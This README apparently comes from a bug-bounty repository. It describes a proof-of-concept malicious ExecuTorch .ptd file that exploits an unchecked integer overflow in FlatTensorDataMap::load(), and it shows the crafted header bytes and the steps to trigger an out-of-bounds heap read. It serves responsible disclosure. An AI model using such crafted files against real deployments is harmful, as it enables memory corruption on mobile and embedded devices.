--- license: mit tags: - security-research - bug-bounty - huntr - executorch --- # SECURITY RESEARCH POC -- ExecuTorch `.ptd` integer overflow This repository contains a **proof-of-concept malicious `.ptd` payload** for a responsible-disclosure bug bounty submission filed at [huntr.com](https://huntr.com) under the Model File Formats program. **The PoC demonstrates an integer-overflow primitive** in `FlatTensorDataMap::load()`: - `extension/flat_tensor/flat_tensor_data_map.cpp:224` -- unchecked `u64 + u64 -> size_t` truncation on attacker-controlled header fields - `extension/flat_tensor/flat_tensor_data_map.cpp:236` -- same primitive used as the LOAD LENGTH, never bounds-checked - Sibling code in `runtime/executor/program.cpp:104-109` uses `c10::add_overflows` correctly -- proof the project knows the right pattern and **missed copies** in the extension PR #19057 ("Fix overflows in et", Apr 24 2026, commit ec5e8e4) hardened the `get_named_data` path of the same file but did NOT touch lines 224/236. Static missed-copy with confirmed-attention bug-surface anchor. ## Files | File | Purpose | |---|---| | `malicious.ptd` | 256-byte byte-exact PoC. Two header fields are crafted to wrap on `u64 + u64 -> size_t`. Inspect with `xxd malicious.ptd`. | | `craft_malicious_ptd.py` | Static crafter -- reproduces `malicious.ptd` from scratch. No ExecuTorch build needed. | | `verify_unpatched.py` | One-command reviewer-side verifier. Fetches the live `extension/flat_tensor/flat_tensor_data_map.cpp` from `pytorch/executorch` main HEAD and confirms 7 unguarded `u64+u64` sites still present alongside 1 correctly-guarded `c10::add_overflows`. Runs in <5 seconds. | ## Verification (no ExecuTorch build required) ```bash pip install urllib3 python verify_unpatched.py ``` Expected output (verbatim): ``` [BUG CONFIRMED] The file uses c10::add_overflows correctly elsewhere (1 call sites) but has 7 unguarded u64+u64 additions on attacker-controlled header fields. This is the missed-copy of the Aug 2025 CVE-2025-30402/30404/30405 remediation pattern, in a code path that PR #19057 (Apr 24 2026) added overflow guards to OTHER parts of. ``` Inspect the malicious file: ```bash xxd malicious.ptd | head -5 ``` Shows the wraparound-mate header values: ``` 00000000: 0000 0000 0000 0000 4648 3031 2800 0000 ........FH01(... 00000010: 4000 0000 0000 0000 00ff ffff ffff ffff @............... 00000020: ffff ffff 0000 0000 4100 0000 0100 0000 ........A....... ``` (Note: bytes shown are little-endian; `flatbuffer_size = 0xFFFF_FFFF_FFFF_FF00` and `segment_data_size = 0x0000_0001_0000_0041`.) ## Runtime PoC (ExecuTorch build required) To trigger the OOB read at runtime: ```bash git clone https://github.com/pytorch/executorch.git cd executorch && ./install_executorch.sh # Build the runtime + ASan, then point any FlatTensorDataMap::load() consumer at this file. ``` Under ASan, the load produces a clean `heap-buffer-overflow` report. Without ASan, the result depends on the data loader: - `BufferDataLoader` -> OOB read into adjacent heap allocations - `MmapDataLoader` -> OOB read into adjacent VMA pages On 32-bit ARM (ExecuTorch's primary deployment target -- mobile / embedded / Cortex-M), `size_t` is 32-bit and both header arithmetic sites overflow silently -- direct heap-corruption-grade primitive. ## Affected component - **ExecuTorch** (`pytorch/executorch`) -- current `main` HEAD, post-commit `1c9c115`. Pre-patch. - **File**: `extension/flat_tensor/flat_tensor_data_map.cpp` lines 224 and 236. - **Same bug class also unhardened**: `runtime/executor/pte_data_map.cpp:57-60` (out of scope for this report). ## Disclosure status This PoC is part of a responsible-disclosure submission filed via huntr's Model File Formats bug bounty program. After triage and remediation, this repository will be marked private or deleted. ## Disclaimer This repository is intended for security research and responsible disclosure only. Do not use the techniques shown here on systems you do not own or have permission to test. ## Contact Security researcher: **kais113** (amakais.sales@gmail.com)